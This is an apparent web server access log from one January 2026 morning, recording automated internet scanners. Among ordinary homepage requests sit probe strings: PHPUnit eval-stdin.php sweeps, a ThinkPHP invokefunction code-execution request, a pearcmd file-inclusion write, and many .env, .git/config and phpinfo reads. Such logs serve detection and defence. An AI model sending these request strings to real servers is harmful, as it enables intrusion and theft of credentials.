404 - GET http 91.82.215.191 "/phpunit/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:33 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:34 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:34 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:35 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:36 +0000] 404 - GET http 91.82.215.191 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:36 +0000] 404 - GET http 91.82.215.191 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:37 +0000] 404 - GET http 91.82.215.191 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:37 +0000] 404 - GET http 91.82.215.191 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:37 +0000] 404 - GET http 91.82.215.191 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:38 +0000] 404 - GET http 91.82.215.191 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:38 +0000] 404 - GET http 91.82.215.191 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:39 +0000] 404 - GET http 91.82.215.191 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:40 +0000] 404 - GET http 91.82.215.191 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:40 +0000] 404 - GET http 91.82.215.191 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:41 +0000] 404 - GET http 91.82.215.191 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:41 +0000] 404 - GET http 91.82.215.191 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:42 +0000] 404 - GET http 91.82.215.191 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:42 +0000] 404 - GET http 91.82.215.191 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:43 +0000] 404 - GET http 91.82.215.191 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:43 +0000] 404 - GET http 91.82.215.191 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:43 +0000] 404 - GET http 91.82.215.191 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:44 +0000] 404 - GET http 91.82.215.191 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:45 +0000] 404 - GET http 91.82.215.191 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:45 +0000] 404 - GET http 91.82.215.191 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:46 +0000] 404 - GET http 91.82.215.191 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:47 +0000] 404 - GET http 91.82.215.191 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:47 +0000] 404 - GET http 91.82.215.191 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:48 +0000] 404 - GET http 91.82.215.191 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:48 +0000] 404 - GET http 91.82.215.191 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:49 +0000] 403 - GET http 91.82.215.191 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:49 +0000] 403 - GET http 91.82.215.191 "/index.php?lang=../../../../../../../../tmp/index1" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:06:58:50 +0000] 404 - GET http 91.82.215.191 "/containers/json" [Client 101.36.107.228] [Length 150] [Gzip -] "libredtail-http" "-" +[28/Jan/2026:07:12:08 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:07:32:23 +0000] 200 - GET http 91.82.215.191 "/" [Client 45.156.129.130] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[28/Jan/2026:07:33:21 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.69] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:07:36:10 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:07:39:44 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:07:40:23 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[28/Jan/2026:07:42:55 +0000] 400 - GET http 91.82.215.191 "/.env" [Client 146.190.164.150] [Length 252] [Gzip -] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[28/Jan/2026:07:42:56 +0000] 400 - GET http 91.82.215.191 "/.git/config" [Client 146.190.164.150] [Length 252] [Gzip -] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[28/Jan/2026:07:43:12 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:07:43:44 +0000] 404 - GET http 91.82.215.191 "/.env" [Client 45.148.10.124] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" "-" +[28/Jan/2026:07:43:53 +0000] 404 - GET http 91.82.215.191 "/.env" [Client 45.148.10.124] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Linux; Android 9; Pixel 3 XL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36" "-" +[28/Jan/2026:07:44:41 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:08:03:09 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:08:05:06 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[28/Jan/2026:08:21:59 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.69.37.120] [Length 0] [Gzip -] "-" "-" +[28/Jan/2026:08:24:28 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:08:28:31 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:08:28:32 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:08:29:39 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:08:38:32 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:08:41:26 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:08:46:59 +0000] 200 - GET http 91.82.215.191 "/" [Client 64.62.156.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15" "-" +[28/Jan/2026:08:47:51 +0000] 404 - GET http 91.82.215.191 "/webui/" [Client 64.62.156.212] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0" "-" +[28/Jan/2026:08:49:14 +0000] 400 - GET http 91.82.215.191 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[28/Jan/2026:08:49:51 +0000] 404 - GET http 91.82.215.191 "/geoserver/web/" [Client 64.62.156.212] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15" "-" +[28/Jan/2026:08:50:54 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[28/Jan/2026:08:55:20 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:09:05:22 +0000] 400 - GET http 91.82.215.191 "/" [Client 3.132.23.201] [Length 654] [Gzip -] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[28/Jan/2026:09:05:25 +0000] 400 - GET http 91.82.215.191 "/" [Client 3.132.23.201] [Length 654] [Gzip -] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[28/Jan/2026:09:07:11 +0000] 400 - - http localhost "-" [Client 3.132.23.201] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:09:11:41 +0000] 400 - - http localhost "-" [Client 3.132.23.201] [Length 0] [Gzip -] "-" "-" +[28/Jan/2026:09:15:20 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:09:15:36 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:09:19:59 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:09:28:45 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:09:29:05 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:09:41:24 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.69] [Length 1033] [Gzip -] "-" "-" +[28/Jan/2026:09:42:35 +0000] 400 - GET http localhost-nginx-proxy-manager "/" [Client 109.236.61.3] [Length 154] [Gzip -] "curl/7.68.0" "-" +[28/Jan/2026:09:43:12 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[28/Jan/2026:09:43:34 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:09:47:04 +0000] 404 - GET http 91.82.215.191 "/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0" "-" +[28/Jan/2026:09:47:05 +0000] 404 - GET http 91.82.215.191 "/api/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/522.11 (KHTML, like Gecko) Version/3.0.2 Safari/522.12" "-" +[28/Jan/2026:09:47:05 +0000] 404 - GET http 91.82.215.191 "/backend/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Android 4.4.2; Mobile; rv:55.0) Gecko/55.0 Firefox/55.0" "-" +[28/Jan/2026:09:47:05 +0000] 404 - GET http 91.82.215.191 "/admin/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:48.0) Gecko/20100101 Firefox/48.0" "-" +[28/Jan/2026:09:47:05 +0000] 404 - GET http 91.82.215.191 "/.env.example" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36" "-" +[28/Jan/2026:09:47:06 +0000] 404 - GET http 91.82.215.191 "/app_dev.php/_profiler/phpinfo" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/4.0 (Windows; U; Windows NT 5.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0" "-" +[28/Jan/2026:09:47:06 +0000] 200 - GET http 91.82.215.191 "/?phpinfo=-1" [Client 78.153.140.151] [Length 1033] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; LG-M430 Build/NRD90U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.107 Mobile Safari/537.36" "-" +[28/Jan/2026:09:47:06 +0000] 200 - GET http 91.82.215.191 "/?url=.env" [Client 78.153.140.151] [Length 1033] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13F69 Safari/601.1" "-" +[28/Jan/2026:09:47:06 +0000] 404 - GET http 91.82.215.191 "/staging/.env" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; UHG_Win7_Build 11-15-2010)" "-" +[28/Jan/2026:09:47:06 +0000] 404 - GET http 91.82.215.191 "/app_dev.php/_profiler/open?file=app/config/parameters.yml" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36" "-" +[28/Jan/2026:09:47:06 +0000] 404 - GET http 91.82.215.191 "/phpinfo.php" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.1.0) Gecko/20100101 Firefox/50.1.0" "-" +[28/Jan/2026:09:47:06 +0000] 404 - GET http 91.82.215.191 "/info/" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686) Opera 7.23 [fi]" "-" +[28/Jan/2026:09:47:06 +0000] 404 - GET http 91.82.215.191 "/app/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Opera/9.10 (X11; Linux i686; U; en)" "-" +[28/Jan/2026:09:47:07 +0000] 404 - GET http 91.82.215.191 "/phpinfo/" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36" "-" +[28/Jan/2026:09:47:07 +0000] 404 - GET http 91.82.215.191 "/dev/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; Next8P12 Build/IMM76I) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30" "-" +[28/Jan/2026:09:47:07 +0000] 404 - GET http 91.82.215.191 "/.env.production" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b5pre) Gecko/2008030706 Firefox/3.0b5pre" "-" +[28/Jan/2026:09:47:07 +0000] 404 - GET http 91.82.215.191 "/.env.save" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 2.3.6; it-it; GT-S5570I Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" +[28/Jan/2026:09:47:07 +0000] 404 - GET http 91.82.215.191 "/demo/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; OpenBSD sparc64; en-CA; rv:1.8.0.2) Gecko/20060429 Firefox/1.5.0.2" "-" +[28/Jan/2026:09:47:07 +0000] 404 - GET http 91.82.215.191 "/img/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.3 Safari/601.7.8" "-" +[28/Jan/2026:09:47:07 +0000] 404 - GET http 91.82.215.191 "/vendor/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "HTC_Dream Mozilla/5.0 (Linux; U; Android 1.5; en-ca; Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1" "-" +[28/Jan/2026:09:47:07 +0000] 404 - GET http 91.82.215.191 "/php-info.php" [Client 78.153.140.151] [Length 150] [Gzip -] "BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/5.0.3.3 UP.Link/5.1.2.12 (Google WAP Proxy/1.0)" "-" +[28/Jan/2026:09:47:08 +0000] 404 - GET http 91.82.215.191 "/inf/" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ATT-IE11; rv:11.0) like Gecko" "-" +[28/Jan/2026:09:47:08 +0000] 404 - GET http 91.82.215.191 "/upload/.env" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" "-" +[28/Jan/2026:09:47:08 +0000] 404 - GET http 91.82.215.191 "/includes/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_5 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G36 Safari/601.1" "-" +[28/Jan/2026:09:47:08 +0000] 404 - GET http 91.82.215.191 "/APPS/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (iPad; CPU OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C75 Safari/601.1" "-" +[28/Jan/2026:09:47:08 +0000] 404 - GET http 91.82.215.191 "/application/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "MSIE (MSIE 6.0; X11; Linux; i686) Opera 7.23" "-" +[28/Jan/2026:09:47:08 +0000] 404 - GET http 91.82.215.191 "/.config" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:42.0) Gecko/20100101 Firefox/42.0" "-" +[28/Jan/2026:09:47:08 +0000] 404 - GET http 91.82.215.191 "/doc/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040225 Firefox/0.8" "-" +[28/Jan/2026:09:47:08 +0000] 404 - GET http 91.82.215.191 "/css/.env" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36 OPR/51.0.2830.26" "-" +[28/Jan/2026:09:47:09 +0000] 404 - GET http 91.82.215.191 "/framework/.env" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36" "-" +[28/Jan/2026:09:51:28 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 65.49.1.222] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:09:58:48 +0000] 200 - GET http 91.82.215.191 "/" [Client 103.203.57.3] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[28/Jan/2026:10:01:28 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:10:07:05 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:10:07:09 +0000] 400 - - http localhost "-" [Client 20.29.56.247] [Length 154] [Gzip -] "-" "-" +[28/Jan/2026:10:10:12 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:10:12:07 +0000] 404 - GET http 91.82.215.191 "/portal/redlion" [Client 40.80.206.215] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[28/Jan/2026:10:23:17 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:10:25:24 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:10:28:19 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[28/Jan/2026:10:30:24 +0000] 200 - GET http 91.82.215.191 "/?XDEBUG_SESSION_START=phpstorm" [Client 79.124.40.174] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[28/Jan/2026:10:47:52 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[28/Jan/2026:10:55:14 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[28/Jan/2026:11:02:22 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" 